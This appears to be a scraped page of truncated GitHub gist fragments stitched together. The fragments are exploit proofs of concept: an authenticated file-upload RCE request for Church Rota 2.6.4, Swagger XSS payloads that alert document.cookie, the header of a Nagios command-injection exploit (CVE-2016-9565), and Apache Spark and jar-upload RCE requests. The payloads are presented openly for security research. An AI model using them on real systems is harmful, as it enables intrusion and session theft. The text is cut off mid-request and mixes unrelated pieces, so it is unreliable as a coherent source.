POST /login.php5 HTTP/1.1
Accept: application/json
Connection: close
Content-Length: 100
Content-Type: application/json
{
"login_auth": 0,
"miniHiveUI": 1,
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
14 apple.com | |
40 vk.com | |
44 github.com | |
49 tumblr.com | |
55 dropbox.com | |
85 medium.com | |
87 paypal.com | |
92 icloud.com | |
100 booking.com | |
112 weebly.com |
Church Rota version 2.6.4 is vulnerable to authenticated remote code execution. The user does not need to have file upload permission in order to upload and execute an arbitrary file.
POST /resources.php?action=newsent HTTP/1.1
Host: 192.168.43.187
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: id,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------36504512417128952451539028145
Content-Length: 526
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
swagger: '2.0' | |
info: | |
title: Swagger Test | |
description: <img src=x onerror=\"alert(document.domain)\"> | |
default: <script>console.log(‘000000000000000000dad0000000000000000000');</script> | |
license: | |
name: BSD | |
url: <img src=x onerror=\"alert(document.domain)\"> | |
version: '30' | |
produces: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
swagger: "2.0", | |
info: | |
title: "Swagger Test Poc XSS", | |
description: "Please to click Terms of service" | |
termsOfService: "javascript:alert(document.cookie)" | |
contact: | |
name: "API Support", | |
url: "javascript:alert(document.cookie)", | |
email: "javascript:alert(document.cookie)" | |
version: "1.0.1" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
{ | |
"swagger": "2.0", | |
"info": { | |
"title": "Swagger Test Poc XSS", | |
"description": "Please to click Terms of service", | |
"termsOfService": "javasript:alert(document.domain)", | |
"version": "1.0.1" | |
}, | |
"basePath": "/v1", | |
"schemes": [ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
intro = """\033[94m | |
Nagios Core < 4.2.0 Curl Command Injection PoC Exploit (CVE-2016-9565) | |
nagios_cmd_injection.py ver. 1.0 | |
Discovered & Coded by: | |
Dawid Golunski | |
https://legalhackers.com | |
\033[0m |
- vendor page: https://pacsone.net/
- patched version: 7.1.1
- Credits: Xinjie Ma from Chaitin Research Lab
- 2020.07.19 send report to a vendor's partner
- 2020.07.20 they inform the real vendor
Apache Sprak RCE
POST /v1/submissions/create HTTP/1.1
Host: ip:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 619
Content-Type: application/json;charset=UTF-8
Accept-Encoding: gzip
{
POST /jars/upload HTTP/1.1
Host: REDACTED:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 187
Content-Type: multipart/form-data;boundary=8ce4b16b22b58894aa86c421e8759df3
Accept-Encoding: gzip
--8ce4b16b22b58894aa86c421e8759df3
Content-Disposition: form-data; name="jarfile";filename="pikpikcu.jar"